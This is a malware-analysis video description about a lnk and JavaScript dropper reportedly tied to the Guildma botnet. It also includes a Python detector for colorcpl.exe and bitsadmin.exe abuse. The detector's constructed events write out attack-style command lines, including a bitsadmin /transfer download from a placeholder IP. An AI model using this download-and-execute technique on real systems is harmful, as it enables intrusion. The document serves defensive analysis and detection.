Malware Bazaar diving video. I'll look at a lnk file and associated JavaScript file. Interesting stage two JS that uses colorcpl to move bitsadmin into the color directory, and then uses it to download many files and execute the bot. The tags on Malware Bazaar flag this as loading the Guildma botnet (I offer no insight into the validity of that). A fun piece of malware with some interesting rabbit holes looking at bitsadmin and colorcpl.
Sample lnk: https://bazaar.abuse.ch/sample/3e5c83...
Sample js: https://bazaar.abuse.ch/sample/ea6215...
FireEye / Mandiant red_team_tool_countermeasures: https://github.com/mandiant/red_team_...
eral4m colorcpl tweet: / 1480468728324231172
LnkParse3: https://github.com/Matmaus/LnkParse3
☕ Buy Me A Coffee: https://www.buymeacoffee.com/0xdf
[00:00] Introduction
[00:40] Looking at Malware Bazaar
[01:36] Quick look at lnk in Windows
[02:27] lnkparse
[03:44] %comspec%
[04:17] Analysis of lnk target
[06:13] Decoded JS
[07:58] Failing to download stage 2 JS
[08:21] Overview of stage 2 JS
[10:46] First function, fromCharCode
[11:07] Second function, download_to_file
[15:01] Understanding bitsadmin.exe /transfer
[16:12] Third function, inc counter
[16:43] Fourth function, main
[19:25] colorcpl.exe exploration
[23:27] File downloads and execution in main
[24:29] Next stage exploration
[25:11] Conclusion
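The stage-two behaviour described above (colorcpl.exe used to copy bitsadmin.exe into the color directory, then bitsadmin /transfer used for downloads) gives a defender three process-creation signals to watch for. The detector below is an added example, not code from the video or from 0xdf; it assumes Sysmon-style process-creation events with image, command line and parent fields, and uses constructed sample events rather than the real sample's values.

```python
import ntpath
import re

# Constructed Sysmon-style process-creation events (not taken from the sample).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe //B C:\Users\Public\stage2.js",
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\colorcpl.exe",
     "cmdline": r"colorcpl.exe C:\Windows\System32\bitsadmin.exe",
     "parent": r"C:\Windows\System32\wscript.exe"},
    {"image": r"C:\Windows\System32\spool\drivers\color\bitsadmin.exe",
     "cmdline": r"bitsadmin.exe /transfer job /download /priority high "
                r"http://198.51.100.7/a.bin C:\Users\Public\a.bin",
     "parent": r"C:\Windows\System32\wscript.exe"},
    {"image": r"C:\Windows\System32\colorcpl.exe", "cmdline": "colorcpl.exe",
     "parent": r"C:\Windows\explorer.exe"},  # benign: Color Management opened normally
]

SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}


def detect(event):
    """Return a list of finding strings for one process-creation event."""
    findings = []
    image = event["image"].lower()
    name = ntpath.basename(image)
    cmd = event["cmdline"]
    parent = ntpath.basename(event["parent"]).lower()

    # 1. colorcpl.exe given a file argument: it copies that file into the color directory.
    if name == "colorcpl.exe":
        parts = cmd.split(None, 1)
        args = parts[1] if len(parts) > 1 else ""
        if re.search(r"\.(exe|dll|js|vbs)\b", args, re.I):
            findings.append("colorcpl.exe used to copy a file into the color directory")

    if name == "bitsadmin.exe":
        # 2. bitsadmin.exe should only ever run from System32/SysWOW64 (exact match,
        #    so the spool\drivers\color subdirectory is still flagged).
        directory = ntpath.dirname(image)
        if directory not in SYSTEM_DIRS:
            findings.append("bitsadmin.exe executed from a non-system path: " + directory)
        # 3. bitsadmin /transfer pulling from a URL under a script host parent.
        if re.search(r"/transfer\b", cmd, re.I) and re.search(r"https?://", cmd, re.I) \
                and parent in SCRIPT_HOSTS:
            findings.append("bitsadmin /transfer download launched from " + parent)
    return findings


def scan(events):
    """Run detect() over a list of events; returns (event index, finding) pairs."""
    return [(i, f) for i, e in enumerate(events) for f in detect(e)]
```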
Video: Malicious Lnk and JavaScript Analysis. Uploaded by 0xdf on 9 March 2023; 1,539 views and 67 likes on this site.